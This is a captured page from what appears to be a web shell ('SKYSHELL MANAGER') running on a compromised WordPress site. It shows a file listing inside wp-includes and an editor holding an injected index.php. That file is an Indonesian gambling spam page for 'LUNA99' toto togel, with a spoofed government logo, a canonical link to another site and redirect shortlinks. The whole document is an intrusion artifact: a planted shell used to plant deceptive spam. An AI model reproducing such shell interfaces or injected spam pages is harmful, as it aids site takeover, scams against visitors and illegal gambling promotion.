📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
drhyperbaric.com
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
modern
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
331.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.php
<!DOCTYPE html> <html amp lang="id-ID"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width,initial-scale=1"> <meta name="color-scheme" content="dark"> <title>LUNA99 $ Link Alternatif Resmi & Daftar Toto Togel Online Saat Ini</title> <meta name="description" content="LUNA99 menyediakan link alternatif daftar resmi terpercaya untuk toto togel online saat ini. Nikmati kemudahan akses login bebas blokir, aplikasi versi terbaru, pilihan pasaran terlengkap, transaksi cepat, serta jaminan keamanan data dan layanan support 24/7." /> <link rel="canonical" href="https://beyondhyperbarics.com/" /> <link rel="shortcut icon" href="https://upload.wikimedia.org/wikipedia/commons/c/cf/Logo_Kementerian_Lingkungan_Hidup_-_Badan_Pengendalian_Lingkungan_Hidup_%282024%29.png?utm_source=commons.wikimedia.org&utm_campaign=index&utm_content=original" /> <link rel="preconnect" href="https://cdn.ampproject.org/"> <link rel="preload" as="script" href="https://cdn.ampproject.org/v0.js"> <script async src="https://cdn.ampproject.org/v0.js"></script> <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600;800&family=Orbitron:wght@700&display=swap" rel="stylesheet"> <style amp-custom> /* === PALET WARNA PEGUNUNGAN & ALAM === */ :root { --forest-deep: #0a1f13; --mountain-dark: #123321; --emerald-light: #42dc00; --emerald-bright: #25ff00; --gold-sun: #ffd700; --mist-white: rgba(255, 255, 255, 0.85); --bg-gradient: linear-gradient(180deg, #07150c 0%, #102e1d 40%, #081d11 100%); } * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: 'Poppins', sans-serif; background: var(--bg-gradient); color: #fff; min-height: 100vh; display: flex; flex-direction: column; align-items: center; justify-content: center; overflow-x: hidden; position: relative; } a { text-decoration: none; color: inherit; transition: 0.3s; } /* === CONTAINER === */ #container { width: 100%; max-width: 480px; /* Mobile Friendly Width */ padding: 20px; position: relative; z-index: 5; } /* === LOGO ANIMATION === */ .logo-wrapper { text-align: center; margin-bottom: 20px; animation: floatMountain 4s ease-in-out infinite; } @keyframes floatMountain { 0%, 100% { transform: translateY(0); } 50% { transform: translateY(-8px); } } .logo-img { filter: drop-shadow(0 0 18px rgba(37, 255, 0, 0.4)); } /* === TITLE === */ h1.title { font-family: 'Orbitron', sans-serif; font-size: 17px; text-align: center; text-transform: uppercase; margin-bottom: 25px; background: linear-gradient(to right, #ffffff, #72efdd, var(--emerald-light), #ffffff); -webkit-background-clip: text; -webkit-text-fill-color: transparent; text-shadow: 0 0 20px rgba(66, 220, 0, 0.4); line-height: 1.4; letter-spacing: 0.5px; } /* === HERO IMAGE CARD WITH MOUNTAIN GLOW === */ .hero-card { border-radius: 20px; overflow: hidden; border: 2px solid var(--emerald-light); box-shadow: 0 10px 30px rgba(0, 0, 0, 0.6), 0 0 25px rgba(66, 220, 0, 0.35); margin-bottom: 30px; position: relative; background: rgba(18, 51, 33, 0.6); backdrop-filter: blur(5px); } .hero-card::after { content: ''; position: absolute; top: 0; left: -100%; width: 50%; height: 100%; background: linear-gradient(90deg, transparent, rgba(255,255,255,0.3), transparent); transform: skewX(-25deg); animation: breezeShine 3.5s infinite; } @keyframes breezeShine { 0% { left: -100%; } 30%, 100% { left: 200%; } } /* === BUTTONS (PEGUNUNGAN & ALAM STYLE) === */ .btn-list { display: flex; flex-direction: column; gap: 15px; } .btn { display: flex; align-items: center; justify-content: center; padding: 16px; border-radius: 50px; font-weight: 800; font-size: 16px; text-transform: uppercase; letter-spacing: 1px; position: relative; overflow: hidden; border: 2px solid transparent; box-shadow: 0 6px 18px rgba(0,0,0,0.4); transition: transform 0.2s ease, box-shadow 0.2s ease; } /* Tombol Daftar (Emerald / Lime Glowing) */ .btn-login { background: linear-gradient(90deg, #10e965, #25ff00, #14e90e); background-size: 200% auto; color: #05140a; animation: shimmer 3s linear infinite; box-shadow: 0 0 20px rgba(37, 255, 0, 0.4); } /* Tombol Login (Merah Sunburst) */ .btn-daftar { background: linear-gradient(90deg, #df0e0e, #b40000, #c90d0d); background-size: 200% auto; color: #fff; animation: shimmer 3s linear infinite reverse; border-color: rgba(255,255,255,0.2); } /* Tombol Alternatif (Misty Mountain Glass) */ .btn-alt { background: rgba(255, 255, 255, 0.08); color: #a7f3d0; border: 1px solid var(--emerald-light); backdrop-filter: blur(8px); } @keyframes shimmer { to { background-position: 200% center; } } .btn:active, .btn:hover { transform: scale(1.02); box-shadow: 0 0 25px rgba(66, 220, 0, 0.6); } /* === FOOTER === */ .footer { margin-top: 35px; font-size: 12px; color: #728a7c; text-align: center; } .footer a { color: var(--emerald-light); font-weight: 600; } /* === SILUET PEGUNUNGAN (CSS MOUNTAIN BACKGROUND) === */ .mountain-bg { position: fixed; bottom: 0; left: 0; width: 100%; height: 280px; z-index: 1; pointer-events: none; background: radial-gradient(circle at 50% 100%, rgba(37, 255, 0, 0.08) 0%, transparent 70%), url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 1440 320'%3E%3Cpath fill='%2305140a' fill-opacity='0.7' d='M0,192L60,181.3C120,171,240,149,360,160C480,171,600,213,720,208C840,203,960,149,1080,138.7C1200,128,1320,160,1380,176L1440,192L1440,320L1380,320C1320,320,1200,320,1080,320C960,320,840,320,720,320C600,320,480,320,360,320C240,320,120,320,60,320L0,320Z'%3E%3C/path%3E%3Cpath fill='%23020904' fill-opacity='0.9' d='M0,256L80,229.3C160,203,320,149,480,165.3C640,181,800,267,960,266.7C1120,267,1280,181,1360,138.7L1440,96L1440,320L1360,320C1280,320,1120,320,960,320C800,320,640,320,480,320C320,320,160,320,80,320L0,320Z'%3E%3C/path%3E%3C/svg%3E"); background-size: cover; background-position: bottom; } /* === ANIMASI DAUN BERHEMBUS ANGIN (BLOWING LEAVES) === */ .leaves-container { position: fixed; top: 0; left: 0; width: 100%; height: 100%; pointer-events: none; z-index: 2; overflow: hidden; } .leaf { position: absolute; font-size: 22px; opacity: 0; filter: drop-shadow(0 0 6px rgba(37, 255, 0, 0.6)); animation: windBreeze 10s linear infinite; } /* Variasi Posisi & Kecepatan Daun */ .leaf:nth-child(1) { top: -5%; left: -10%; animation-duration: 9s; animation-delay: 0s; font-size: 26px; } .leaf:nth-child(2) { top: 15%; left: -10%; animation-duration: 12s; animation-delay: 2s; font-size: 20px; } .leaf:nth-child(3) { top: 35%; left: -10%; animation-duration: 8s; animation-delay: 4s; font-size: 28px; } .leaf:nth-child(4) { top: 55%; left: -10%; animation-duration: 11s; animation-delay: 1.5s; font-size: 22px; } .leaf:nth-child(5) { top: 70%; left: -10%; animation-duration: 13s; animation-delay: 5s; font-size: 24px; } .leaf:nth-child(6) { top: 25%; left: -10%; animation-duration: 10s; animation-delay: 7s; font-size: 18px; } @keyframes windBreeze { 0% { transform: translate(0, 0) rotate(0deg) scale(0.7); opacity: 0; } 15% { opacity: 0.85; } 85% { opacity: 0.85; } 100% { transform: translate(120vw, 45vh) rotate(720deg) scale(1.2); opacity: 0; } } </style> <style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript> </head> <body> <!-- SILUET PEGUNUNGAN & EFEK EMBUN --> <div class="mountain-bg"></div> <!-- EFEK ANIMASI DAUN BERHEMBUS ANGIN --> <div class="leaves-container"> <div class="leaf">🍃</div> <div class="leaf">🌿</div> <div class="leaf">🍃</div> <div class="leaf">🍂</div> <div class="leaf">🍃</div> <div class="leaf">🌿</div> </div> <!-- UTAMA / CONTAINER --> <div id="container"> <div class="logo-wrapper"> <amp-img src="https://congnghesoasc.com/images/slot-gacorr.png" alt="LUNA99" width="300" height="65" layout="intrinsic" class="logo-img"> </amp-img> </div> <h1 class="title">LUNA99 $ Link Alternatif Resmi & Daftar Toto Togel Online Saat Ini</h1> <div class="hero-card"> <amp-img src="https://i.pinimg.com/1200x/ed/c8/05/edc805d2b6a196fe486707975f727e79.jpg" alt="LUNA99" width="400" height="400" layout="responsive"> </amp-img> </div> <div class="btn-list"> <a href="https://jali.me/luna77" class="btn btn-login"> DAFTAR LUNA99 </a> <a href="https://jali.me/luna77" class="btn btn-daftar"> LOGIN LUNA99 </a> <a href="https://jali.me/luna77" class="btn btn-alt"> LUNA99 ALTERNATIF </a> </div> <div class="footer"> <p>© 2026 <a href="https://beyondhyperbarics.com/">LUNA99</a>. All Rights Reserved.</p> </div> </div> </body> </html>
Save